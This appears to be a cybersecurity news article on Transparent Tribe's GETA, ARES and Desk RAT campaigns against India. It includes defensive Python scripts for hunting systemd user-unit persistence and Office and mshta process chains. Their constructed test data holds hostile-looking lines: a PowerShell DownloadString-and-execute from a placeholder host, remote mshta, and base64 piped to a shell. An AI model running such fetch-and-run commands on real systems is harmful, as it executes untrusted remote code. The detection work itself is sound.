👤 AGONY
🗓️ 10 Feb 2026   🌍 Asia

Shadow Networks: How Pakistan-Linked Hackers Launched a Triple RAT Siege on India

Subtitle: A web of stealthy malware campaigns reveals how espionage and economics collide in the modern cyber battlefield.

On a humid Monday morning, as India’s government offices buzzed with routine, invisible adversaries were already at work. Emails - seemingly innocuous - slipped through digital defenses, carrying payloads that would burrow deep into the nation’s most sensitive networks. Behind this onslaught: Transparent Tribe, a Pakistan-linked cyber-espionage group, orchestrating a sophisticated, three-pronged attack that signals a new era of digital intrigue - where the lines between politics, economics, and warfare blur.

Recent investigations by Aryaka’s security team have exposed how Transparent Tribe (APT36) has evolved its toolkit, orchestrating multi-platform campaigns that target not just Windows but also Linux environments. The first strike uses GETA RAT, a .NET-based tool favored by the SideCopy subgroup. By abusing trusted, built-in Windows utilities such as mshta.exe, and by relying on XAML deserialization rather than a conventional dropped executable, GETA RAT evades signature-based antivirus detection and sets up a durable, covert foothold for long-term surveillance.

Meanwhile, Linux systems are far from immune. The ARES RAT, Python-based and delivered via a Go downloader, profiles infected machines and systematically siphons off data. Its persistence mechanism is a systemd user service: a per-user unit that needs no root privileges, is started again whenever the user’s session comes up after a reboot, and sits alongside legitimate user units under the same directories. That blending with ordinary user-level services is what makes it hard for defenders to spot.
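A defender hunting for the persistence technique just described would enumerate the directories systemd reads per-user units from and score each unit on a few heuristics. The script below is an added example, not code from Aryaka’s report or from ARES RAT itself; the unit files it scores are constructed samples, the directory list and the scoring weights are assumptions, and the hidden-directory heuristic is deliberately noisy and should be tuned to the estate.

```python
"""Hunt for suspicious systemd *user* services (added example, constructed samples)."""
import configparser
import re
import tempfile
from pathlib import Path

# Directories systemd --user reads units from; writable without root (assumed list).
USER_UNIT_DIRS = ("~/.config/systemd/user", "~/.local/share/systemd/user")
FLAG_THRESHOLD = 3  # assumed cut-off; tune to your estate

# Temp directories, or a hidden directory other than the usual ~/.local, ~/.config, ~/.cache.
SUSPICIOUS_PATH = re.compile(r"(^|\s)(/tmp|/dev/shm|/var/tmp)/|/\.(?!local/|config/|cache/)[^/\s]+/")
INTERPRETER = re.compile(r"(^|/)(python[0-9.]*|perl|sh|bash)(\s|$)")
INLINE_SCRIPT = re.compile(r"\s-c\s|base64\s+(-d|--decode)")


def parse_unit(text):
    """Unit files are INI-like; keep key case and allow repeated keys such as ExecStartPre."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str
    cp.read_string(text)
    return cp


def score_unit(text):
    """Return (score, reasons) for one unit file's contents."""
    cp = parse_unit(text)
    service = cp["Service"] if cp.has_section("Service") else {}
    unit = cp["Unit"] if cp.has_section("Unit") else {}
    exec_start = service.get("ExecStart", "")
    score, reasons = 0, []
    if SUSPICIOUS_PATH.search(exec_start):
        score += 2; reasons.append("ExecStart in temp or hidden directory")
    if INTERPRETER.search(exec_start):
        score += 1; reasons.append("ExecStart runs an interpreter")
    if INLINE_SCRIPT.search(exec_start):
        score += 2; reasons.append("inline script or base64 decode in ExecStart")
    if not unit.get("Description"):
        score += 1; reasons.append("no Description")
    if service.get("Restart", "no").lower() in ("always", "on-failure"):
        score += 1; reasons.append("auto-restart")
    return score, reasons


def scan_dir(unit_dir):
    """Score every *.service file in a directory; missing directories yield nothing."""
    root = Path(unit_dir).expanduser()
    if not root.is_dir():
        return {}
    return {p.name: score_unit(p.read_text()) for p in sorted(root.glob("*.service"))}


# Constructed samples: one ordinary user unit, two modelled on RAT-style persistence.
SAMPLES = {
    "pipewire.service": """[Unit]
Description=Constructed sample: ordinary user-level audio daemon
[Service]
ExecStart=/usr/bin/pipewire
[Install]
WantedBy=default.target
""",
    "sysupdate.service": """[Service]
ExecStart=/usr/bin/python3 /home/victim/.local/share/.sysupdate/agent.py
Restart=always
RestartSec=30
[Install]
WantedBy=default.target
""",
    "dbus-helper.service": """[Service]
ExecStart=/bin/sh -c "echo ZWNobyBoaQ== | base64 -d | sh"
Restart=on-failure
[Install]
WantedBy=default.target
""",
}


def demo():
    """Write the constructed samples to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as d:
        for name, text in SAMPLES.items():
            (Path(d) / name).write_text(text)
        return scan_dir(d)


if __name__ == "__main__":
    for d in USER_UNIT_DIRS:
        for name, (score, reasons) in scan_dir(d).items():
            if score >= FLAG_THRESHOLD:
                print(f"[{score}] {d}/{name}: {', '.join(reasons)}")
    print("demo:", demo())
```

Run it as the user under investigation (systemd user units are per account), and pair the file scan with `systemctl --user list-units --type=service` so that units loaded from a location the script does not list still show up.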

The third prong, Desk RAT, is a newer Go-based creation distributed through malicious PowerPoint add-ins. It collects granular system diagnostics and communicates with its operators over WebSocket, giving them a live pulse on compromised machines. Each RAT uses phishing as its entry point - sometimes through poisoned LNK files, ELF binaries, or script-laden attachments - before deploying payloads that live off the land, abusing built-in system tools to avoid raising alarms.
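The Windows side of the chain above (an Office document or add-in spawning a built-in utility, mshta.exe pulling remote content, a shortcut-style launch from explorer.exe) is visible in process-creation telemetry. The rules below are an added example written for this page, not detection content from Aryaka or any product: the events are Sysmon-style dicts with Image, ParentImage and CommandLine fields, the sample events are constructed (the domain is under the reserved .invalid TLD), and the rule names and binary lists are assumptions.

```python
"""Flag process-creation events matching the intrusion chain described above (added example)."""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Built-in binaries commonly abused for living-off-the-land execution (assumed list).
LOLBINS = {"mshta.exe", "rundll32.exe", "regsvr32.exe", "wscript.exe",
           "cscript.exe", "powershell.exe", "cmd.exe", "certutil.exe"}
REMOTE = re.compile(r"\b(https?|ftp)://|\\\\[\w.-]+\\", re.I)            # URL or UNC path
HIDDEN_FLAGS = re.compile(r"-(w(indowstyle)?\s+hidden|nop|enc(odedcommand)?)\b", re.I)
ADDIN_OR_HTA = re.compile(r"\.(ppam|xlam|wll|hta)\b", re.I)
USER_WRITABLE = re.compile(r"\\(Downloads|Temp|AppData\\Local\\Temp|Public)\\", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the rule names one event triggers (empty list = nothing seen)."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    if parent in OFFICE_APPS and image in LOLBINS:
        hits.append("office_spawned_lolbin")          # macro or add-in launching a child
    if image == "mshta.exe" and REMOTE.search(cmd):
        hits.append("mshta_remote_content")           # HTA fetched over the network
    if parent == "explorer.exe" and image in LOLBINS and (REMOTE.search(cmd) or HIDDEN_FLAGS.search(cmd)):
        hits.append("shortcut_style_launch")          # the shape a poisoned LNK produces
    if ADDIN_OR_HTA.search(cmd) and USER_WRITABLE.search(cmd):
        hits.append("addin_from_user_writable_dir")   # e.g. a .ppam opened from Downloads
    return hits


def scan(events):
    """Evaluate a sequence of events; result list is parallel to the input."""
    return [evaluate(e) for e in events]


OFFICE = "C:\\Program Files\\Microsoft Office\\root\\Office16\\"
# Constructed sample events: two benign, four modelled on the article's delivery methods.
SAMPLE_EVENTS = [
    {"Image": OFFICE + "WINWORD.EXE", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": f'"{OFFICE}WINWORD.EXE" /n "C:\\Users\\victim\\Documents\\budget.docx"'},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe Get-Process"},
    {"Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": OFFICE + "WINWORD.EXE",
     "CommandLine": "mshta.exe https://example.invalid/update.hta"},
    {"Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": OFFICE + "POWERPNT.EXE",
     "CommandLine": 'cmd.exe /c powershell -w hidden -nop -f "C:\\Users\\victim\\AppData\\Local\\Temp\\stage.ps1"'},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe -w hidden -nop -c IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/a'))"},
    {"Image": OFFICE + "POWERPNT.EXE", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": f'"{OFFICE}POWERPNT.EXE" /n "C:\\Users\\victim\\Downloads\\agenda.ppam"'},
]


if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(basename(event["Image"]), "<-", basename(event["ParentImage"]), hits or "clean")
```

The explorer.exe rule is the noisiest of the four (administrators do launch PowerShell from the desktop), so in production it is worth gating it on the remote-content or hidden-window argument as done here rather than on the parent alone; the Office-parent rule, by contrast, is rarely benign and is the one that catches the add-in delivery directly.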

What emerges is a portrait of modern cyber-espionage: not just shadowy state actors probing for military secrets, but economic rivals seeking competitive advantage. As Aryaka’s Aditya Sood notes, the motivation extends beyond geopolitics; with multi-billion-dollar trade deals at stake, intelligence on defense budgets and procurement plans has become a lucrative target.

The implications are sobering. As the tools of cyberwarfare become more persistent and stealthy, even “friendly” nations may turn their gaze toward one another, driven by the high stakes of global trade. For defenders, the challenge is clear: vigilance must evolve as quickly as the adversaries lurking in the digital shadows.

Conclusion

The Transparent Tribe campaigns mark a pivotal shift in cyber conflict - where espionage, economics, and technology collide. As India and its rivals invest in digital arsenals, the next frontier of competition will be fought not just on borders, but deep within the circuits and code of critical infrastructure. The age of stealthy RATs is here, and the world’s security teams are on notice.

WIKICROOK

  • Remote Access Trojan (RAT): A Remote Access Trojan (RAT) is malware that lets attackers secretly control a victim’s computer from anywhere, enabling theft and spying.
  • Persistence: Persistence involves techniques used by malware to survive reboots and stay hidden on systems, often by mimicking legitimate processes or updates.
  • Living off the Land: Living off the Land means attackers use trusted, already-installed system tools (LOLBins) for malicious actions, making their activity stealthy and hard to distinguish from normal administration.
  • Phishing: Phishing is a cybercrime where attackers send fake messages to trick users into revealing sensitive data or clicking malicious links.
  • Command and Control (C2): Command and Control is the channel through which an attacker’s server sends instructions to implanted malware and receives the data it collects.
Tags: Cyber-espionage, Remote Access Trojans, Transparent Tribe
